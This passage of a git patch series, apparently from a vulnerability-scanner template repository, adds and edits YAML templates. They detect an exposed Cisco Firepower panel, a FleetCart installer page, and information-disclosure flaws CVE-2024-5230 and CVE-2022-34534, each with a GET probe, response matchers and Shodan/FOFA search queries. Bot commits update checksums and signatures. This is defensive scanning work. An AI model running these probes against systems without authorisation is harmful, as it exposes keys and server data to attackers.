CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: max-request: 1 shodan-query: html:"cisco firepower management" - tags: console,login,cisco + verified: true + tags: login,cisco,panel,console http: - method: GET path: - '{{BaseURL}}/ui/login' - + matchers-condition: and matchers: - type: word + part: body words: - "Cisco Firepower Management Center" - part: body - + - "Login" + condition: and + - type: status status: - 200 @@ -34,4 +38,4 @@ http: part: body group: 1 regex: - - "'version':\\s*'(\\d+\\.\\d+\\.\\d+)'" \ No newline at end of file + - "'version':\\s*'(\\d+\\.\\d+\\.\\d+)'" From a3ccb67b81c7dccdcd4553e0d3e3aa9e1c34bd8f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 09:43:48 +0530 Subject: [PATCH 1400/1768] minor update --- http/cves/2023/CVE-2023-3077.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/cves/2023/CVE-2023-3077.yaml b/http/cves/2023/CVE-2023-3077.yaml index bb7b1b3fb1..2a61a79863 100644 --- a/http/cves/2023/CVE-2023-3077.yaml +++ b/http/cves/2023/CVE-2023-3077.yaml @@ -28,6 +28,8 @@ info: publicwww-query: "/wp-content/plugins/mstore-api/" tags: cve,cve2023,wpscan,wordpress,wp-plugin,wp,mstore-api +flow: http(1) && http(2) + http: - method: GET path: From 3c31cb5c4e933f6adb0f7fd6a45eecacfd5ac5d1 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 09:54:05 +0530 Subject: [PATCH 1401/1768] minor update --- http/cves/2024/CVE-2024-5230.yaml | 18 ++++++++++++++---- 1 file changed, 14 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-5230.yaml b/http/cves/2024/CVE-2024-5230.yaml index d9b6f5a47c..64b2bb9e0e 100644 --- a/http/cves/2024/CVE-2024-5230.yaml +++ b/http/cves/2024/CVE-2024-5230.yaml @@ -9,6 +9,8 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2024-5230 - https://packetstormsecurity.com/files/178770/FleetCart-4.1.1-Information-Disclosure.html - https://codecanyon.net/item/fleetcart-laravel-ecommerce-system/23014826 + - https://vuldb.com/?ctiid.265981 + - https://vuldb.com/?id.265981 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 @@ -16,18 +18,26 @@ info: cwe-id: CWE-200 epss-score: 0.00045 epss-percentile: 0.15047 - tags: packetstorm,cms,fleetcart + metadata: + verified: true + max-request: 1 + shodan-query: html:"FleetCart" + tags: cve,cve2024,packetstorm,cms,fleetcart,info-leak http: - method: GET path: - "{{BaseURL}}/en/products?query=123" + matchers-condition: and matchers: - type: dsl dsl: - - 'contains(body, "razorpayKeyId:")' - - 'contains(body, "loggedIn:")' - - 'contains(body, "storeName:")' + - 'contains_all(body, "razorpayKeyId:", "loggedIn:", "storeName:")' - 'status_code == 200' condition: and + + - type: word + words: + - "razorpayKeyId: ''" + negative: true From a115cd38cc062ac6d0458c707eb804fe7f4eaeca Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 09:55:42 +0530 Subject: [PATCH 1402/1768] fix lint --- http/exposed-panels/cisco-firepower-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/cisco-firepower-panel.yaml b/http/exposed-panels/cisco-firepower-panel.yaml index 37da40469f..ff88c46fa1 100644 --- a/http/exposed-panels/cisco-firepower-panel.yaml +++ b/http/exposed-panels/cisco-firepower-panel.yaml @@ -38,4 +38,4 @@ http: part: body group: 1 regex: - - "'version':\\s*'(\\d+\\.\\d+\\.\\d+)'" + - "'version':\\s*'(\\d+\\.\\d+\\.\\d+)'" From 8a431d061657d2aec7995a952ec7d1cb5f91a8f3 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 04:27:47 +0000 Subject: [PATCH 1403/1768] Auto Generated New Template Addition List [Tue May 28 04:27:47 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 5c7d43d121..5f437a1e93 100644 --- a/.new-additions +++ b/.new-additions @@ -6,5 +6,6 @@ http/cves/2024/CVE-2024-21683.yaml http/default-logins/cambium-networks/cambium-networks-default-login.yaml http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml +http/misconfiguration/installer/openemr-setup-installer.yaml http/vulnerabilities/other/array-vpn-lfi.yaml http/vulnerabilities/other/cerio-dt-rce.yaml From 2eda65d632ff6ea851a9aeb4a81564668b996505 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 04:27:59 +0000 Subject: [PATCH 1404/1768] Auto Generated Templates Checksum [Tue May 28 04:27:59 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index da10a12ff7..de0f4f74b1 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -878,7 +878,7 @@ http/cnvd/2023/CNVD-2023-08743.yaml:8c2c0d1a7f369a2570b604f2aa5820f2de976388 http/cnvd/2023/CNVD-2023-12632.yaml:20d2c023ba88ea69568ea70c9619a6f229c9a929 http/cnvd/2023/CNVD-2023-96945.yaml:af381634d92b6ad37814da12d2f652c60614fe75 http/cnvd/2023/CNVD-C-2023-76801.yaml:7a741a8fbfcf92c4df98e64eada67899895d8078 -http/cnvd/2024/CNVD-2024-15077.yaml:887e7fe81022c33cab23d055b11a056f2954ce3e +http/cnvd/2024/CNVD-2024-15077.yaml:d97b1860e5154481146b5ebaf48f57448f62ecd1 http/credential-stuffing/README.md:88a738a7af33e930f046a6681114389b2f341fa2 http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml:8362d36f1fa45da68449901d392ba84be2f4a368 http/credential-stuffing/cloud/atlassian-login-check.yaml:18f7078d79a54b1741f82227ef0ffad50287ba20 @@ -5457,6 +5457,7 @@ http/misconfiguration/installer/nodebb-installer.yaml:ed1f90625817f7ea87343d84d7 http/misconfiguration/installer/nopcommerce-installer.yaml:bfd555e9315506be53f26705388e2c20e2459d8a http/misconfiguration/installer/octoprint-installer.yaml:71f945261262e651c1349fcf4912d78330ed427e http/misconfiguration/installer/ojs-installer.yaml:9db5a6615b0a8adb210daea73705dac97b071006 +http/misconfiguration/installer/openemr-setup-installer.yaml:42580122b5f3baf39b6ed9ce05448787892a186e http/misconfiguration/installer/openfire-setup.yaml:a297d11c8460758d07481671287ba0d2e41026d0 http/misconfiguration/installer/openmage-install.yaml:180e538959d9ad22f7f6c64648e8d392383334bc http/misconfiguration/installer/openshift-installer-panel.yaml:280afbeb89c73b3664bc5167fb4cafb15723d8d7 @@ -8568,7 +8569,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6d4e5de5e32a68caa7c038ae0546baf678dd280c +templates-checksum.txt:8ef346790e190638a75fc498b6c1129dd1cf2c83 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From f430c1528f9ca8397a7d8d42d08cc88daeeb53a1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 04:28:36 +0000 Subject: [PATCH 1405/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index c531aa033b..7796c01f4d 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -11,6 +11,7 @@ on: - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' - 'http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' + - 'http/misconfiguration/installer/openemr-setup-installer.yaml' - 'http/vulnerabilities/other/array-vpn-lfi.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' workflow_dispatch: From acef25d5a36b2fa20661c6e1d4308af9943f04b8 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 04:28:39 +0000 Subject: [PATCH 1406/1768] Auto Generated New Template Addition List [Tue May 28 04:28:39 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 5f437a1e93..91904d5827 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ http/cves/2022/CVE-2022-1580.yaml http/cves/2023/CVE-2023-2059.yaml http/cves/2023/CVE-2023-48084.yaml http/cves/2024/CVE-2024-21683.yaml +http/cves/2024/CVE-2024-5230.yaml http/default-logins/cambium-networks/cambium-networks-default-login.yaml http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml From 1cd1e789e42ed27483e5eea42f8295ec87e96928 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 04:28:52 +0000 Subject: [PATCH 1407/1768] Auto Generated Templates Checksum [Tue May 28 04:28:52 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index de0f4f74b1..279664685c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3309,6 +3309,7 @@ http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82 http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b http/cves/2024/CVE-2024-4956.yaml:930d1f49e8fdefd809f7aea2f0dddc2f3a160d09 +http/cves/2024/CVE-2024-5230.yaml:27a9920bb129073dfab0352ad0228520072142a8 http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda @@ -8569,7 +8570,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:8ef346790e190638a75fc498b6c1129dd1cf2c83 +templates-checksum.txt:a28027d00ed5fbb51ad08da319e30f7e863bcd26 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 55132aa3ae602ae672c560c4cedf8a626e02fdf7 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 04:29:20 +0000 Subject: [PATCH 1408/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 7796c01f4d..d8223308c0 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -8,6 +8,7 @@ on: - 'http/cves/2023/CVE-2023-2059.yaml' - 'http/cves/2023/CVE-2023-48084.yaml' - 'http/cves/2024/CVE-2024-21683.yaml' + - 'http/cves/2024/CVE-2024-5230.yaml' - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' - 'http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' From 0acf69e55b144bed7497bb2093c8d1b3e0a750a7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 04:29:32 +0000 Subject: [PATCH 1409/1768] Auto Template Signing [Tue May 28 04:29:32 UTC 2024] :robot: --- http/misconfiguration/installer/openemr-setup-installer.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/installer/openemr-setup-installer.yaml b/http/misconfiguration/installer/openemr-setup-installer.yaml index d4675908b6..150f54f472 100644 --- a/http/misconfiguration/installer/openemr-setup-installer.yaml +++ b/http/misconfiguration/installer/openemr-setup-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502202cf66b82cebacca9440cc78fd0922133f4e91b8e86908e5dd2b54aa7a6f278cf022100a35c14528df108de85c35e33149958f93481e5df88b51d5159a9f854c1f6fec5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From fc70c1d867d7532dd779db232791006e527e526e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 04:30:21 +0000 Subject: [PATCH 1410/1768] Auto Generated Templates Checksum [Tue May 28 04:30:21 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 279664685c..6826a11ea5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3686,6 +3686,7 @@ http/exposed-panels/cisco/cisco-telepresence.yaml:e9b4284c22e08f4917559c6be0860d http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml:30c5f3cfe8561c54e0adb4d02392c6da5b62a065 http/exposed-panels/cisco/cisco-vmanage-login.yaml:5351d182ea82467eccbd30dd51a81fb025495a09 http/exposed-panels/cisco/cisco-webvpn-detect.yaml:13e201d34aa8034c696fa5c262ea118ddda3adc6 +http/exposed-panels/cisco-firepower-panel.yaml:57420b28c1d1907c75a5b2ebc1e635c53a47acbe http/exposed-panels/cisco-unity-panel.yaml:6fae7cdb91904c1e5848876a1de55d505ef868bb http/exposed-panels/citrix-adc-gateway-detect.yaml:799ec0472142a2c95e6aa9611b7ad1404bd0b433 http/exposed-panels/citrix-vpn-detect.yaml:6d5b20d32d07689c25e8552271fde112a03f301c @@ -5458,7 +5459,7 @@ http/misconfiguration/installer/nodebb-installer.yaml:ed1f90625817f7ea87343d84d7 http/misconfiguration/installer/nopcommerce-installer.yaml:bfd555e9315506be53f26705388e2c20e2459d8a http/misconfiguration/installer/octoprint-installer.yaml:71f945261262e651c1349fcf4912d78330ed427e http/misconfiguration/installer/ojs-installer.yaml:9db5a6615b0a8adb210daea73705dac97b071006 -http/misconfiguration/installer/openemr-setup-installer.yaml:42580122b5f3baf39b6ed9ce05448787892a186e +http/misconfiguration/installer/openemr-setup-installer.yaml:3492aff559423b20f44da10634d6bbf53a426871 http/misconfiguration/installer/openfire-setup.yaml:a297d11c8460758d07481671287ba0d2e41026d0 http/misconfiguration/installer/openmage-install.yaml:180e538959d9ad22f7f6c64648e8d392383334bc http/misconfiguration/installer/openshift-installer-panel.yaml:280afbeb89c73b3664bc5167fb4cafb15723d8d7 @@ -8570,7 +8571,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:a28027d00ed5fbb51ad08da319e30f7e863bcd26 +templates-checksum.txt:ea98d771b89481a5a5a7adf96b1305eeb52c0b96 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From db9c29ff3ac90446af8769af837db1c03cce075b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 10:00:32 +0530 Subject: [PATCH 1411/1768] Create fleetcart-installer.yaml --- .../installer/fleetcart-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/fleetcart-installer.yaml diff --git a/http/misconfiguration/installer/fleetcart-installer.yaml b/http/misconfiguration/installer/fleetcart-installer.yaml new file mode 100644 index 0000000000..5f1c3542a1 --- /dev/null +++ b/http/misconfiguration/installer/fleetcart-installer.yaml @@ -0,0 +1,31 @@ +id: fleetcart-installer + +info: + name: FleetCart Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed FleetCart setup installation pages which could allow unauthorized access or information disclosure. + reference: + - https://codecanyon.net/item/fleetcart-laravel-ecommerce-system/23014826 + metadata: + verified: true + max-request: 1 + shodan-query: html:"FleetCart - Installation" + tags: misconfig,install,exposure,fleetcart + +http: + - method: GET + path: + - "{{BaseURL}}/install" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "FleetCart - Installation" + + - type: status + status: + - 200 From cbde017dc639106a8555421de7a442dd534f4467 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 04:31:01 +0000 Subject: [PATCH 1412/1768] Auto Generated New Template Addition List [Tue May 28 04:31:01 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 91904d5827..a12e385e85 100644 --- a/.new-additions +++ b/.new-additions @@ -6,7 +6,9 @@ http/cves/2024/CVE-2024-21683.yaml http/cves/2024/CVE-2024-5230.yaml http/default-logins/cambium-networks/cambium-networks-default-login.yaml http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml +http/exposed-panels/cisco-firepower-panel.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml http/misconfiguration/installer/openemr-setup-installer.yaml +http/technologies/gotweb-detect.yaml http/vulnerabilities/other/array-vpn-lfi.yaml http/vulnerabilities/other/cerio-dt-rce.yaml From 0b7e90f165a519a33c8df5a7fe5a36fdf2c35411 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 04:31:08 +0000 Subject: [PATCH 1413/1768] Auto Generated Templates Checksum [Tue May 28 04:31:08 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6826a11ea5..92a41fc52e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6764,6 +6764,7 @@ http/technologies/google/firebase-urls.yaml:567d690e4e228892b057512c135046889827 http/technologies/google/google-bucket-service.yaml:25ac8e0dd8cbf94da469ecc917650a838c45117d http/technologies/google/google-storage.yaml:f43cd532e5f0230d310a4e0f856add1ecb8dd333 http/technologies/google-frontend-httpserver.yaml:de094bfafe3b5aea16e1bffb3ab80cf789a6e3fb +http/technologies/gotweb-detect.yaml:8fc5e3378e4984c8e405a36d33067d00f719889f http/technologies/graphiql-detect.yaml:a50e33498f73c5c27694fdad64d7d5f06dc1fe29 http/technologies/graphql-detect.yaml:968b73b40f5fcb70f7ce8ed1c620f59611886e97 http/technologies/grav-cms-detect.yaml:f353a0fa76204ccd1c894aa850f977fef8c769f1 @@ -8571,7 +8572,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:ea98d771b89481a5a5a7adf96b1305eeb52c0b96 +templates-checksum.txt:6846caba734b2f189845b0d4401d9a821b0c352a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 34e61d0067f050aa6f4accda98227a6168fe89d7 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 04:31:48 +0000 Subject: [PATCH 1414/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index d8223308c0..eb2b7515c3 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -11,8 +11,10 @@ on: - 'http/cves/2024/CVE-2024-5230.yaml' - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' - 'http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml' + - 'http/exposed-panels/cisco-firepower-panel.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' + - 'http/technologies/gotweb-detect.yaml' - 'http/vulnerabilities/other/array-vpn-lfi.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' workflow_dispatch: From dc106eb44b619a5e5284099fdca643995598c6f6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 04:32:07 +0000 Subject: [PATCH 1415/1768] Auto Template Signing [Tue May 28 04:32:07 UTC 2024] :robot: --- http/cves/2024/CVE-2024-5230.yaml | 1 + http/exposed-panels/cisco-firepower-panel.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2024/CVE-2024-5230.yaml b/http/cves/2024/CVE-2024-5230.yaml index 64b2bb9e0e..8e9a21cbc1 100644 --- a/http/cves/2024/CVE-2024-5230.yaml +++ b/http/cves/2024/CVE-2024-5230.yaml @@ -41,3 +41,4 @@ http: words: - "razorpayKeyId: ''" negative: true +# digest: 4a0a0047304502202589ef7ca56aded6f60e4a6c0894c0b451861abb90f144b7ae86726f61ea08660221009037f9cdb2941ceee500ec88de24b43cc3c61b752e03131c46470c4a62ea090a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco-firepower-panel.yaml b/http/exposed-panels/cisco-firepower-panel.yaml index ff88c46fa1..da59aded97 100644 --- a/http/exposed-panels/cisco-firepower-panel.yaml +++ b/http/exposed-panels/cisco-firepower-panel.yaml @@ -39,3 +39,4 @@ http: group: 1 regex: - "'version':\\s*'(\\d+\\.\\d+\\.\\d+)'" +# digest: 4a0a004730450220026366c1c44b76bd077fdcb97ff6b07b21fbe1b9b87a25d978c0aa9f8e0a9bd3022100f60575f7d011eacf77f7a25d0c6b632bba00038b40986cd2fc2cdee645ee975e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 9a2b2f43baca2b13a340310412151cddffce80b3 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 28 May 2024 13:15:26 +0530 Subject: [PATCH 1416/1768] Create CVE-2022-34534.yaml --- http/cves/2022/CVE-2022-34534.yaml | 38 ++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 http/cves/2022/CVE-2022-34534.yaml diff --git a/http/cves/2022/CVE-2022-34534.yaml b/http/cves/2022/CVE-2022-34534.yaml new file mode 100644 index 0000000000..7b7501b58a --- /dev/null +++ b/http/cves/2022/CVE-2022-34534.yaml @@ -0,0 +1,38 @@ +id: CVE-2022-34534 + +info: + name: Digital Watchdog DW Spectrum Server 4.2.0.32842 - Information Disclosure + author: ritikchaddha + severity: high + description: | + Digital Watchdog DW Spectrum Server 4.2.0.32842 allows attackers to access sensitive infromation via a crafted API call. + reference: + - https://gist.github.com/secgrant/820faeeaa0cb4889edaa1d6fef83deab + - https://nvd.nist.gov/vuln/detail/CVE-2022-34534 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-34534 + cwe-id: CWE-200 + cpe: cpe:2.3:o:dw:spectrum_server_firmware:4.2.0.32842:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: dw + product: spectrum_server + shodan-query: http.favicon.hash:868509217 + fofa-query: icon_hash="868509217" + tags: cve,cve2022,digital-watchdog,dw,spectrum,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/api/moduleInformation" + + matchers: + - type: dsl + dsl: + - 'contains_all(body, "name\":", "cloudHost\":", "remoteAddresses")' + - 'contains(header, "application/json")' + - 'status_code == 200' + condition: and From 4ff6028c801a44a63f62076c0cad1cc5dfad4f9b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 13:42:41 +0530 Subject: [PATCH 1417/1768] minor update --- http/cves/2022/CVE-2022-34534.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/http/cves/2022/CVE-2022-34534.yaml b/http/cves/2022/CVE-2022-34534.yaml index 7b7501b58a..fae020741f 100644 --- a/http/cves/2022/CVE-2022-34534.yaml +++ b/http/cves/2022/CVE-2022-34534.yaml @@ -14,12 +14,14 @@ info: cvss-score: 7.5 cve-id: CVE-2022-34534 cwe-id: CWE-200 + epss-score: 0.0015 + epss-percentile: 0.51136 cpe: cpe:2.3:o:dw:spectrum_server_firmware:4.2.0.32842:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: dw - product: spectrum_server + product: spectrum_server_firmware shodan-query: http.favicon.hash:868509217 fofa-query: icon_hash="868509217" tags: cve,cve2022,digital-watchdog,dw,spectrum,exposure From 5703f615d65965c3bc16632f520684caab264e6c Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 08:15:48 +0000 Subject: [PATCH 1418/1768] Auto Generated New Template Addition List [Tue May 28 08:15:47 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index a12e385e85..24579f4fac 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,6 @@ http/cnvd/2024/CNVD-2024-15077.yaml http/cves/2022/CVE-2022-1580.yaml +http/cves/2022/CVE-2022-34534.yaml http/cves/2023/CVE-2023-2059.yaml http/cves/2023/CVE-2023-48084.yaml http/cves/2024/CVE-2024-21683.yaml From 54f61a8a28e31b26fc2c04bde908c209083f6964 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 08:15:59 +0000 Subject: [PATCH 1419/1768] Auto Generated Templates Checksum [Tue May 28 08:15:59 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 92a41fc52e..a5daed5fe1 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2727,6 +2727,7 @@ http/cves/2022/CVE-2022-34093.yaml:d833077c3ed2bacc7f3727cc8b423acfc2a3ac5a http/cves/2022/CVE-2022-34094.yaml:dab272e28788fe06a9fba7dcfb3794e42b03f59f http/cves/2022/CVE-2022-34121.yaml:80284aa2ee2e18c06f64a2744b0215855866624c http/cves/2022/CVE-2022-34328.yaml:6c4ef061ec996841be3e4b953085fd717719a55c +http/cves/2022/CVE-2022-34534.yaml:824d6f0bde84220544d30db4a3423ccc9ab42892 http/cves/2022/CVE-2022-34576.yaml:b3007f2a02f22b1b712f6c3dce81e78d002de661 http/cves/2022/CVE-2022-34590.yaml:976120387598d43ed2f73139b0b4b0e641cdeff3 http/cves/2022/CVE-2022-34753.yaml:27251e7b69ecc21f41223cab8a946027d57de4f3 @@ -3309,7 +3310,7 @@ http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82 http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b http/cves/2024/CVE-2024-4956.yaml:930d1f49e8fdefd809f7aea2f0dddc2f3a160d09 -http/cves/2024/CVE-2024-5230.yaml:27a9920bb129073dfab0352ad0228520072142a8 +http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda @@ -3686,7 +3687,7 @@ http/exposed-panels/cisco/cisco-telepresence.yaml:e9b4284c22e08f4917559c6be0860d http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml:30c5f3cfe8561c54e0adb4d02392c6da5b62a065 http/exposed-panels/cisco/cisco-vmanage-login.yaml:5351d182ea82467eccbd30dd51a81fb025495a09 http/exposed-panels/cisco/cisco-webvpn-detect.yaml:13e201d34aa8034c696fa5c262ea118ddda3adc6 -http/exposed-panels/cisco-firepower-panel.yaml:57420b28c1d1907c75a5b2ebc1e635c53a47acbe +http/exposed-panels/cisco-firepower-panel.yaml:177776db2f788ac7c3bb6fb4b0c242d4921c58af 